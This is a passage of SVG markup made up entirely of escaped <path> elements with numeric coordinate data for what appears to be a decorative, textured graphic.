d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        